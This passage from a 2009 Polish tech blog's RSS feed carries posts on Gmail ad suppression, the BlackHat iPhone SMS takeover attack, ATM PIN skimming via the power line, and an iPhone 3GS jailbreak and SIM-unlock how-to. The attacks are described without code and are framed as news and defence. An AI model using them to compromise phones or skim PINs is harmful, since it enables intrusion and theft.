Dwie ważne zmiany na &lt;a href=&quot;http://konieczny.be/geekfun&quot;&gt;Geek*FUN*&lt;/a&gt;.&lt;br&gt;
Parę dni temu dorzuciłem nowe (lipcowe) śmiesznostki, a &lt;a href=&quot;http://blog.ikari.pl&quot;&gt;ikari&lt;/a&gt; dorobił &lt;a href=&quot;http://feeds.feedburner.com/geekfunfeed&quot;&gt;RSS&lt;/a&gt;-a.&lt;br&gt;
&lt;br&gt;
Póki co, materiału nie jest wiele, ale powoli ludzie zaczynają podsyłać coraz więcej nadających się plików. Jakiś gagatek, moment po moim &lt;a href=&quot;http://blip.pl/s/13962952&quot;&gt;blipnięciu&lt;/a&gt; wykupił też domenę geekfun.pl — mam swój typ, i typa pozdrawiam, ciesząc się, że już teraz są ludzie przekonani o &lt;b&gt;sukcesie&lt;/b&gt; projektu ;-) Nie pozostaje mi nic innego, jak zaprosić Was do &lt;a href=&quot;http://konieczny.be/geekfun/&quot;&gt;oglądania&lt;/a&gt; i do &lt;a href=&quot;http://feeds.feedburner.com/geekfunfeed/&quot;&gt;subskrybcji RSS&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
PS: Moim typem na gikfan miesiąca jest &lt;a href=&quot;http://konieczny.be/geekfun/flashplayer_clubbing.jpeg&quot;&gt;klub wymagający flashplayera&lt;/a&gt; przy wejściu... chciaż &lt;a href=&quot;http://konieczny.be/geekfun/KDT_zamieszki_social_media.jpg&quot;&gt;zamieszki przed KDT&lt;/a&gt; z laptopem w tle też są dobre ;-)&lt;/p&gt;
</description><pubDate>Tue, 04 Aug 2009 20:43:35 +0200</pubDate><guid>http://blog.konieczny.be/2009/08/04/nowy-geekfun/</guid><category>funny</category><category>IT</category><category>ja</category><category>przekręty</category><category>rozrywka</category><category>geekfun</category><category>śmieszne</category><category>obrazki</category></item><item><title>[Krwiste!!!] Jak pozbyć się reklam z GMaila?</title><link>http://blog.konieczny.be/2009/08/02/krwiste-jak-pozbyc-sie-reklam-z-gmaila/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7899895/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7899895_071cea2fc2_o.png&quot; width=&quot;500&quot; height=&quot;200&quot; alt=&quot;GMail blood&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Jeśli w treść maila wplączesz jakieś &lt;b&gt;drastyczne&lt;/b&gt; słowo, GMail nie pokaże &quot;Sponsored Links&quot; po prawej stronie e-maila.&lt;br&gt;
&lt;br&gt;
Oto niekrwisty przykład:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7899848/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7899848_76479c1e64_o.png&quot; width=&quot;500&quot; height=&quot;196&quot; alt=&quot;gads_1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
A to już e-mail z antyreklamową wstawką:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7899850/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7899850_d33e2c7aed.jpg&quot; width=&quot;500&quot; height=&quot;173&quot; alt=&quot;Witaj2 - konieczny@gmail.com - Gmail&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
BTW: Nie trzeba się wysilać na krwiste poematy — wystarcza proste &quot;&lt;i&gt;To zdanie dodaję, żeby &lt;b&gt;zabić&lt;/b&gt; reklamy&lt;/i&gt;&quot; ;-) Takie zachowanie wynika z założeń projektowych &lt;a href=&quot;http://mail.google.com/mail/help/about_privacy.html#targeted_ads&quot; rel=&quot;nofollow&quot;&gt;systemu reklamowego&lt;/a&gt; Google'a. System skanujący pocztę, nie podepnie reklam jeśli w treści e-maila wykryje &quot;katastroficzne&quot; określenia.&lt;br&gt;
&lt;br&gt;
Ciekawe, czy to poprawność polityczna Google'a (nie zarabiamy na katastrofach), czy raczej ochrona wizerunku reklamodawców. W końcu kto by chciał, żeby jego marka/produkt kojarzyły się z traumatycznymi przeżyciami? ;)&lt;br&gt;
&lt;br&gt;
PS: Żeby było jasne: nie jestem przeciwnikiem reklam, zwłaszcza w darmowych projektach, i dlatego nie zamierzam korzystać z w/w sposobu.&lt;br&gt;
&lt;br&gt;
Zobacz także: &lt;small style=&quot;color:green&quot;&gt;(podobne wpisy BETA!)&lt;/small&gt;:&lt;br&gt;
-- &lt;a href=&quot;http://blog.konieczny.be/2006/06/26/polish-sex-ads-abusing-google.-again/&quot;&gt;Polish sex-ads abusing Google&lt;/a&gt;&lt;br&gt;
-- &lt;a href=&quot;http://blog.konieczny.be/2006/06/30/oops-they-did-it-again...-google-s-utf-problem/&quot;&gt;Oops, they did it again&lt;/a&gt;&lt;br&gt;
-- &lt;a href=&quot;http://blog.konieczny.be/2006/05/10/is-google-testing-a-new-adsense-layout/&quot;&gt;New AdSense Layout?&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;small&gt;[&lt;a href=&quot;http://homepage.mac.com/joester5/art/gmail.html&quot; rel=&quot;nofollow&quot;&gt;via&lt;/a&gt;]&lt;/small&gt;&lt;/p&gt;
</description><pubDate>Sun, 02 Aug 2009 19:26:14 +0200</pubDate><guid>http://blog.konieczny.be/2009/08/02/krwiste-jak-pozbyc-sie-reklam-z-gmaila/</guid><category>funny</category><category>google</category><category>IT</category><category>lifehacking</category><category>porady</category><category>przekręty</category><category>krew</category><category>blood</category><category>gmail</category><category>ads</category><category>sponsored</category><category>links</category></item><item><title>SMS zawieszający iPhone'a</title><link>http://blog.konieczny.be/2009/07/31/sms-zawieszajacy-iphone-a/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7889839/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7889839_a5c3f6c18d_o.png&quot; width=&quot;500&quot; height=&quot;200&quot; alt=&quot;iPhone SMS attack&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Nieważne, czy twój iPhone jest &lt;a href=&quot;http://blog.konieczny.be/2009/07/30/iphone-3gs-jailbreak-zdjecie-simlocka-i-aktywacja-w-plusgsm/&quot;&gt;jailbreaknięty&lt;/a&gt;, czy nie. Nie ważne, czy masz stary czy najnowszy firmware. I tak jesteś podatny na atak zaprezentowany przez Collina Mullinera i Charliego Millera na konferencji BlackHat.&lt;br&gt;
&lt;br&gt;
Do tej pory, aby przejąć kontrolę nad iPhonem, należało wykorzystać bugi w Safari i namówić ofiarę do odwiedzenia odpowiednio zmodyfikowanej strony WWW — teraz wystarczy tylko &lt;b&gt;poznać jej numer telefonu&lt;/b&gt;...&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Opis ataku&lt;/h3&gt;
&lt;p&gt;Atak wykorzystuje błędy w kodzie usługi CommCenter iPhone'a. Usługa odpowiada za przetwarzanie przychodzących &lt;b&gt;wiadomości SMS&lt;/b&gt;, działa na prawach roota i nie jest sandboksowana. Aby przejąć kontrolę nad iPhonem nalezy wysłać SMS-a z pominięciem ostatnich paru bajtów w &lt;acronym title=&quot;User Data Header&quot;&gt;UDH&lt;/acronym&gt;. Wysyłając kolejne SMS-y można sterować pracą iPhone'a (zgranie książki kontaktowej, propagacja ataku do kontaktów, wysyłanie spamu, wyłączenie tlefonu, etc.).&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Dziura w iPhonie została&amp;nbsp;odkryta metodą fuzzingu&lt;/b&gt;. Pominięto także sieć GMS (podpinając się przez modem), aby nie zbankrutować na koszcie wysłania ok. 500 000 testowych wiadomości SMS. Poniżej dokument opisujący atak:&lt;/p&gt;
&lt;p&gt;&lt;object id=&quot;_ds_9170349&quot; name=&quot;_ds_9170349&quot; width=&quot;500&quot; height=&quot;450&quot; type=&quot;application/x-shockwave-flash&quot; data=&quot;http://viewer.docstoc.com/&quot;&gt;&lt;param name=&quot;FlashVars&quot; value=&quot;doc_id=9170349&amp;amp;mem_id=62354&amp;amp;doc_type=pdf&amp;amp;fullscreen=0&quot;&gt;
&lt;param name=&quot;movie&quot; value=&quot;http://viewer.docstoc.com/&quot;&gt;
&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/object&gt;&lt;/p&gt;
&lt;p&gt;Apple do tej pory nie wypuściło patcha, więc&lt;/p&gt;
&lt;blockquote&gt;jeśli tylko dostaniecie SMS-a z jednym, przypominającym kwadrat znaczkiem, jak najszybciej zrestartujcie iPhone'a!&lt;/blockquote&gt;
&lt;h3&gt;Nie tylko iPhone jest podatny na smsowy atak...&lt;/h3&gt;
&lt;p&gt;Charli i Collin twierdzą, że telefony pracujące pod kontrolą systemu &lt;b&gt;Android&lt;/b&gt; też były podatne na podobne ataki. Google zapatchowało jednak bug w przeciągu dwóch dni.&lt;br&gt;
&lt;br&gt;
Tandem &lt;b&gt;HTC &amp;amp; Windows Mobile&lt;/b&gt; też nie ustrzegł się błędów. Można &quot;wywalić&quot; użytkownikowi interface telefonu, o ile wyśle się kilkaset odpowiednio spreparowanych SMS-ów na jego numer — stąd, nie wydaje mi się, żeby czekała nas masowa zagłada słuchawek z Windowsem...&lt;br&gt;
&lt;br&gt;
Przypominam także, że w styczniu głośno było o &lt;a href=&quot;http://blog.konieczny.be/2009/01/03/jak-zawiesic-nokie-symbiana-jednym-sms-em/&quot;&gt;smsowych atakach na telefony Nokii&lt;/a&gt; pracujące pod kontrolą systemu &lt;b&gt;Symbian&lt;/b&gt;.&lt;/p&gt;
&lt;h3&gt;Jak się chronić przed atakami SMS?&lt;/h3&gt;
&lt;p&gt;Użytkownicy iPhone'a muszą czekać na patcha od Apple'a, nic jednak nie wskazuje na to, że łatka pojawi się szybko... . Atak na Windows Mobile jest ciężki w przeprowadzeniu, więc posiadacze telefonów od HTC mogą moim zdaniem spać spokojnie. Podobnie właściciele zabawek z Androidem - system jest już załatany. Zostaje biedna Nokia, która nie posiada &quot;łatwego&quot; &lt;b&gt;systemu automatycznej aktualizacji oprogramowania&lt;/b&gt;... — iPhone, prędzej czy później, po podpięciu do iTunes zostanie załatany.&lt;br&gt;
&lt;br&gt;
Swoją drogą, ostatnio zastanawiałem się nad tym, jak powinno się podejść do automatycznej aktualizacji softu w telefonach komórkowych. Myślę, że najlepszym wyjściem byłoby stworzenie odpowiedniego &lt;b&gt;protokołu&lt;/b&gt; przy współpracy producentów telefonów i operatorów sieci GSM (w końcu transfer danych kosztuje). To, że takie działania są realne, pokazuje kompromis producentów co do &lt;a href=&quot;http://www.heise-online.pl/news/Zunifikowane-ladowarki-do-komorek-od-przyszlego-roku--/9231&quot;&gt;unifikacji wtyczek&lt;/a&gt; od ładowarek. Obawiam się jednak, że z racji kosztów, nigdy nie doczekamy się &quot;globalnego&quot; protokołu aktualizacji dla telefonów komórkowych... w sumie, dla mnie to nawet i lepiej ;)&lt;br&gt;
&lt;br&gt;
&lt;b&gt;AKTUALIZACJA (2.08.2009)&lt;/b&gt;&lt;br&gt;
Apple wypuściło firmware 3.0.1, który łata dziurę w module SMS.&lt;/p&gt;
</description><pubDate>Fri, 31 Jul 2009 12:45:32 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/31/sms-zawieszajacy-iphone-a/</guid><category>bugs</category><category>GSM</category><category>iPhone</category><category>IT</category><category>security</category><category>Techblog</category><category>SMS</category><category>attack</category><category>exploit</category><category>HTC</category><category>Nokia</category><category>Windows</category><category>Mobile</category><category>Symbian</category><category>Android</category><category>Google</category><category>Apple</category></item><item><title>Hackowanie bankomatu przez gniazdko...</title><link>http://blog.konieczny.be/2009/07/30/hackowanie-bankomatu-przez-gniazdko/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7886734/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7886734_0b2b0ebffa_o.png&quot; width=&quot;500&quot; height=&quot;200&quot; alt=&quot;Electromagnetic Skimming&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Okazuje się, że na nic zaawansowane i &lt;a href=&quot;http://blog.konieczny.be/2009/06/01/atakowanie-bankomatow-prezentacja-w-pdf/&quot;&gt;superbezpieczne HSM-y&lt;/a&gt; montowane w dzisiejszych bankomatach. Na nic też&amp;nbsp;&lt;a href=&quot;http://blog.konieczny.be/2009/06/04/trojan-w-bankomacie/&quot;&gt;łatanie oprogramowania firmy Diebold&lt;/a&gt;, które jest wykorzystywane w większości nowych bankomatów. Próżno także szukać dodatkowej ochrony bankomatu w &lt;a href=&quot;http://blog.konieczny.be/2009/07/21/gaz-pieprzowy-w-bankomacie/&quot;&gt;pryskaniu gazem na atakującego&lt;/a&gt;...&lt;br&gt;
&lt;br&gt;
Dziś, na konferencji BlackHat, Andrea Barisani i Daniele Bianko zaprezentowali nową rodzinę ataków na bankomaty — &lt;b&gt;skimming poprzez sieć elektryczną&lt;/b&gt;. Możecie już wyrzucić swoje mini-kamerki i &lt;a href=&quot;http://blog.konieczny.be/2009/07/11/tekturowe-karty-kredytowe/&quot;&gt;tekturowe pudełka po butach&lt;/a&gt; — jest lepsza metoda, żeby wykraść czyjś PIN ;-)&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Skimming przez sieć elektryczną&lt;/h3&gt;
&lt;p&gt;Zaprezentowany na konferencji sniffer do klawiatur PS/2 należy wpiąć do tej samej sieci elektrycznej w której pracuje bankomat. Sniffer przeprowadza analizę sygnału i wyłapuje uderzenia w poszczególne numerki na bankomatowej klawiaturze. &lt;b&gt;Game over&lt;/b&gt;.&lt;/p&gt;
&lt;h3&gt;Ale pomysł nie jest nowy...&lt;/h3&gt;
&lt;p&gt;Już dwa lata temu, pisałem o &lt;a href=&quot;http://blog.konieczny.be/2007/04/03/ucho-slucha-podsluchuje-i-hakuje-oko-widzi-podglada-i-inform/&quot;&gt;podsłuchu elektronicznym (TEMPEST)&lt;/a&gt; i analizie sygnałów elektrycznych z np. zasilacza komputerowego. Na ich podstawie można wywnioskować czy urządzenie przeprowadza operację deszyfrowania dysku konkretnym (sic!) kluczem kryptograficznym. A jakby tego było mało, &lt;a href=&quot;http://blog.konieczny.be/2007/01/02/temperatura-komputera-zdradza-twoje-ip/&quot;&gt;temperatura komputera&lt;/a&gt;, może zdradzić, którym węzłem sieci TOR jesteśmy... Tak... &lt;i&gt;side-channel attacks&lt;/i&gt; to zdecydowanie ciekawy temat :-)&lt;br&gt;
&lt;br&gt;
Zastanawiam się, czy teraz bankomaty będą teraz podpinane do sieci elektrycznej poprzez &lt;b&gt;specjalne filtry&lt;/b&gt;? Proponowany przez niektórych wymóg wprowadzenia odseparowanej sieci elektrycznej dla bankomatu wydaje się nawet nie tyle kosmicznie drogim rozwiązaniem, co &lt;b&gt;zupełnie oderwanym od rzeczywistości&lt;/b&gt;. (Jest co prawda jeszcze bardziej kosmiczna wizja: własny agregat prądotwórczy dla każdego bankomatu i ekranowanie pomieszczenia w którym stoi za pomocą klatki Faraday'a, albo innego TEMPEST-u... ;-)&lt;br&gt;
&lt;br&gt;
Sprawę mogłyby po części rozwiązać &lt;b&gt;ekrany dotykowe&lt;/b&gt;... ale wtedy przecież otwieramy się na nową grupę ataków, np. &lt;a href=&quot;http://lcamtuf.coredump.cx/tsafe/&quot;&gt;kamerą termowizyjną&lt;/a&gt; albo wspomnianym wcześniej podsłuchem ulotu magnetycznego:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/911591/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/911591_1d0974f29f.jpg&quot; width=&quot;500&quot; height=&quot;375&quot; alt=&quot;EM Analysis&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;i&gt;a) obraz z monitora&lt;br&gt;
b) obraz powstały z analizy ulotu magnetycznego na urządzeniu oddalonym od monitora o kilkadziesiąt metrów&lt;br&gt;
c) nałożenie filtrów ułatwiających odczyt podsłuchiwanego ekranu&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
&lt;b&gt;I co tu zrobić, co, żeby bezpieczniej było, i żeby PIN nie zginął&lt;/b&gt;?&lt;br&gt;
Macie jakieś pomysły?&lt;/p&gt;
</description><pubDate>Thu, 30 Jul 2009 21:59:02 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/30/hackowanie-bankomatu-przez-gniazdko/</guid><category>bankomaty</category><category>bugs</category><category>IT</category><category>przekręty</category><category>security</category><category>Techblog</category><category>atm</category><category>bankomat</category><category>skimming</category><category>tempest</category><category>sniffer</category><category>prąd</category><category>elektryczność</category></item><item><title>Iphone 3GS: jailbreak, zdjęcie simlocka i aktywacja</title><link>http://blog.konieczny.be/2009/07/30/iphone-3gs-jailbreak-zdjecie-simlocka-i-aktywacja-w-plusgsm/</link><description>&lt;div style=&quot;float:right; margin-left:10px;&quot;&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7884278/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7884278_d31b3dcccf_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;iPhone 3GS - unlock, jailbreak &amp;amp; activate&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;p&gt;Wczoraj dostałem od M. &lt;i&gt;iPhone'a 3GS&lt;/i&gt; :-)&lt;br&gt;
&lt;br&gt;
Aktywacja w polskiej sieci GSM (testowałem Plus i Era) oraz zdjęcie simlocka poszły gładko. Podobnie jailbreak.&lt;br&gt;
&lt;br&gt;
Poniżej krótkie HOWTO i recenzja dla osób, które pewnie niebawem staną przed podobnymi problemami - iPhone 3GS ma się bowiem &lt;a href=&quot;http://www.myapple.pl/czytaj.php?id=109468&quot; rel=&quot;nofollow&quot;&gt;na dniach&lt;/a&gt; oficjalnie pojawić w Polsce :)&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Spis treści&lt;/b&gt;:&lt;br&gt;
• &lt;a href=&quot;#iPhone%203G%20aktywacja&quot;&gt;Aktywacja iPhone'a 3GS&lt;/a&gt;&lt;br&gt;
• &lt;a href=&quot;#iPhone%203G%20jailbreak&quot;&gt;Jailbreak iPhone'a 3GS&lt;/a&gt;&lt;br&gt;
• &lt;a href=&quot;#iPhone%203G%20simlock&quot;&gt;Zdjęcie Simlocka w iPhonie 3GS&lt;/a&gt;&lt;br&gt;
• &lt;a href=&quot;#iPhone%203G%20recenzja&quot;&gt;Krótka recenzja iPhone'a 3GS&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a name=&quot;iPhone 3G aktywacja&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Aktywacja iPhone 3GS w polskiej sieci (Plus GSM)&lt;/h3&gt;
&lt;p&gt;W moim przypadku, iPhone 3GS dotarł z brytyjską kartą SIM O2. Dopiero po jej włożeniu i podpięciu do iTunes pojawił się HomeScreen na telefonie. Wcześniej, telefon był bezużyteczny - (Komunikat: Insert valid SIM card). Niestety, bez &quot;oficjalnie dopuszczonej przez Apple&quot; karty, nie da się&amp;nbsp;dostać&amp;nbsp;do telefonu.&lt;br&gt;
&lt;br&gt;
Po pojawieniu się HomeScreenu, można przystąpić do &lt;a href=&quot;http://apple.slashdot.org/article.pl?sid=09/07/29/1440233&quot;&gt;krzywdzącego BTS-y&lt;/a&gt; (hehe) zdobywania roota na telefonie, czyli rozpocząć &lt;b&gt;jailbreakowanie&lt;/b&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a name=&quot;iPhone 3G jailbreak&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Jailbreak iPhone'a 3GS (redsn0w)&lt;/h3&gt;
&lt;p&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Ściągnij firmware w wersji &lt;b&gt;3.0 (7A341)&lt;/b&gt; ze &lt;a href=&quot;http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-6582.20090617.LlI87/iPhone2,1_3.0_7A341_Restore.ipsw&quot;&gt;strony Apple&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Ściągnij aplikację &lt;b&gt;redsn0w 0.8&lt;/b&gt; dla &lt;a href=&quot;http://thebigboss.org/hostedfiles/redsn0w-mac_0.8.zip&quot;&gt;Maca&lt;/a&gt; lub &lt;a href=&quot;http://thebigboss.org/hostedfiles/redsn0w-win_0.8.zip&quot;&gt;Windows&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Sprawdź na jakiej wersji oprogramowania obecnie działa twój iPhone 3GS (Settings-&amp;gt;General-&amp;gt;About-&amp;gt;Version). Jeśli jest to 3.0 (7A341) przejdź do następnego kroku. Jeśli nie, najpierw będziesz musiał wgrać ten firmware na swój telefon. W tym celu podepnij go do iTunes, i trzymając wciśnięty shift (lub option) kliknij na &quot;Restore&quot; i wskaż plik z firmwarem, który ściągnąłeś w punkcie pierwszym.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Odpal redsn0w i wskaż plik z firmwarem ściągnięty w punkcie pierwszym. Kliknij &quot;next&quot; i upewnij się, że &quot;Install Cydia&quot; jest zaznaczone. Kliknij &quot;next&quot;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Redsn0w poinstruuje Cię teraz, jak wprowadzić iPhone 3GS w tryb &quot;recovery&quot;: odłącz telefon od komputera i wyłącz go. Po pięciu sekundach wciśnij przycisk HOME na telefonie i trzymając HOME podłącz telefon do komputera. Nie puszczaj Home'a, dopóki na ekranie telefonu nie pojawi się obrazek z instalacją.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Po instalacji iPhone 3GS zrestartuje się, po czym rozpocznie proces &quot;patchowania&quot; systemu ;-)&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Gotowe - twój iPhone 3GS jest jailbreaknięty!&lt;/p&gt;
&lt;p&gt;Gdybyś miał problemy z powyższym sposobem, alternatywą jest skorzystanie z programu &lt;a href=&quot;http://purplera1n.com/&quot;&gt;purplera1n&lt;/a&gt;, wypuszczonego przez inną osobę.&lt;/p&gt;
&lt;p&gt;&lt;a name=&quot;iPhone 3G simlock&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Jak zdjąć simlock z iPhone'a 3GS? (ultrasn0w)&lt;/h3&gt;
&lt;p&gt;&lt;i&gt;UWAGA! Zdjęcie simlocka jest możliwe tylko po uprzednim jailbreaknięciu iPhone'a.&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
Aby &lt;b&gt;zdjąć simlocka z iPhone'a 3GS&lt;/b&gt; wykorzystamy aplikację &lt;b&gt;ultrasn0w&lt;/b&gt;, którą zainstalujemy z Cydii.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Otwórz aplikację &lt;b&gt;Cydia&lt;/b&gt;. Kliknij na &quot;Manage&quot;, potem &quot;Sources&quot;, potem &quot;Edit&quot; i na końcu &quot;Add&quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Wpisz http://repo666.ultrasn0w.com/ i kliknij na &quot;Add Source&quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Po powrocie do Cydii i zaakceptowaniu zmian, kliknij na dopiero co wprowadzoną nazwę, a Twoim oczom ukaże się aplikacja ultrasn0w. Kliknij na nią i zainstaluj.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Po instalacji ultrasn0w, telefon zrestartuje się i nie będzie już SIM-locka ;-)&lt;/p&gt;
&lt;div style=&quot;width:320px; margin-left: auto; margin-right: auto&quot;&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7884335/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7884335_a3e2fdb2dc_o.jpg&quot; width=&quot;320&quot; height=&quot;480&quot; alt=&quot;photo&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Mamy już&amp;nbsp;zaktywowanego, &quot;jailbreakniętego&quot; iPhone'a 3GS ze zdjętym SIM-lockiem. Pora na recenzję i opis nowości... ale to wrzucę dopiero wieczorem ;-)&lt;/p&gt;
</description><pubDate>Thu, 30 Jul 2009 12:18:55 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/30/iphone-3gs-jailbreak-zdjecie-simlocka-i-aktywacja-w-plusgsm/</guid><category>GSM</category><category>iPhone</category><category>IT</category><category>porady</category><category>Techblog</category><category>3GS</category><category>Apple</category><category>unlock</category><category>simlock</category><category>jailbreak</category><category>activation</category><category>ultrasn0w</category><category>redns0w</category></item><item><title>Lifehacking: oglądanie filmów w samolocie </title><link>http://blog.konieczny.be/2009/07/27/lifehacking-ogladanie-filmow-w-samolocie/</link><description>&lt;p&gt;Kiedy lecę samolotem, iPhone staje się nieodłącznym towarzyszem podróży. Używam go głównie do oglądania filmów. Niestety, po kilkudziesięciu minutach, oglądanie &quot;z ręki&quot; staje się męczące... i właśnie wtedy do akcji wkracza &lt;b&gt;rzygotorebka&lt;/b&gt;! ;)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7869792/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7869792_f2b406a06e.jpg&quot; width=&quot;500&quot; height=&quot;343&quot; alt=&quot;Dock&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;small&gt;Na ekranie fragment &lt;a href=&quot;http://diggnation.com&quot; rel=&quot;nofollow&quot;&gt;Diggnation&lt;/a&gt;, które nota bene podsunęło mi ten pomysł :-)&lt;/small&gt; Chwila wyrywania, dziurka na słuchawki i gotowe. Rozprostowany spód torebki służy jako regulacja kąta nachylenia ekranu.&lt;br&gt;
&lt;br&gt;
PS tak, jestem hardkorem, &lt;i&gt;flight mode is off&lt;/i&gt;. &lt;a href=&quot;http://blog.konieczny.be/2006/01/24/czy-strong-komorka-strong-powoduje-b-katastrofy-lotnicze-b/&quot;&gt;Dlatego&lt;/a&gt;.&lt;/p&gt;
</description><pubDate>Mon, 27 Jul 2009 20:37:21 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/27/lifehacking-ogladanie-filmow-w-samolocie/</guid><category>funny</category><category>iPhone</category><category>IT</category><category>lifehacking</category><category>podróże</category><category>porady</category><category>rozrywka</category><category>życie</category><category>aircraft</category><category>plane</category></item><item><title>Gaz pieprzowy w bankomacie</title><link>http://blog.konieczny.be/2009/07/21/gaz-pieprzowy-w-bankomacie/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7834286/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7834286_3b1e8f48ec_o.png&quot; width=&quot;498&quot; height=&quot;200&quot; alt=&quot;Pepper Spray-tastic on Flickr - Photo Sharing!-1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Absa, jeden z afrykańskich banków wpadł na pomysł wyposażenia swoich bankomatów w miotacze gazu pieprzowego... Gaz ma zapobiegać skimmingowi, czyli próbom manipulacji przy konstrukcji bankomatu celem sczytania danych karty. Problem w tym, że ostatnio miotacze zostały przypadkowo uaktywnione przez pracujących przy bankomacie techników, a opary gazu przedostały się do reszty centrum handlowego, w którym stał bankomat. Skończyło się przyjazdem karetki...&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Agresywne bankomaty?&lt;/h3&gt;
&lt;p&gt;Niedawno pisałem o polskich &quot;skimmerach&quot; korzystających z &lt;a href=&quot;http://blog.konieczny.be/2009/07/11/tekturowe-karty-kredytowe/&quot;&gt;tekturowych kart kredytowych&lt;/a&gt;. W komentarzach padł dość kontrowersyjny pomysł, że &quot;bankomat powinien sprawdzać, czy karta jest oryginalna (wykonana z plastyku)&quot;. Cieżko powiedzieć, czy wprowadzany w Afryce system jest w stanie poddawać testom wkładane do bankomatu karty, ale na pewno byłoby to miłe rozszerzenie...&lt;br&gt;
&lt;br&gt;
Póki co, wiadomo, że afrykański bank opiera swoje rozwiązanie o analizę obrazu z kamery umieszczonej w bankomacie, a obserwującej wejście na karty. Brzmi jak synonim dla &quot;ławe do oszukania&quot; (por. z postem dot. &lt;a href=&quot;http://blog.konieczny.be/2009/06/02/usmiechniety-terrorysta-to-nieuchwytny-terrorysta/&quot;&gt;oszukiwania systemów rozpoznawania twarzy na lotniskach&lt;/a&gt;)&lt;/p&gt;
&lt;h3&gt;A może kopniak w jaja?&lt;/h3&gt;
&lt;p&gt;Zastanawiam się, jakie alternatywne środki ochrony mogłby zostać użyte w bankomatach? Porażenie prądem (po uprzednim zroszeniu wodą, dla lepszego efektu)? A może staropolski kopniak w jaja? Oba rozwiązania są chyba równie &quot;pomysłowe&quot; jak gaz pieprzowy...&lt;br&gt;
&lt;br&gt;
Mam tylko nadzieję, że już niebawem nie będę musiał przed skorzystaniem z bankomatu zakładać maski przeciwgazowej, ochraniaczy na krocze i gumowych rękawiczek...&lt;br&gt;
&lt;br&gt;
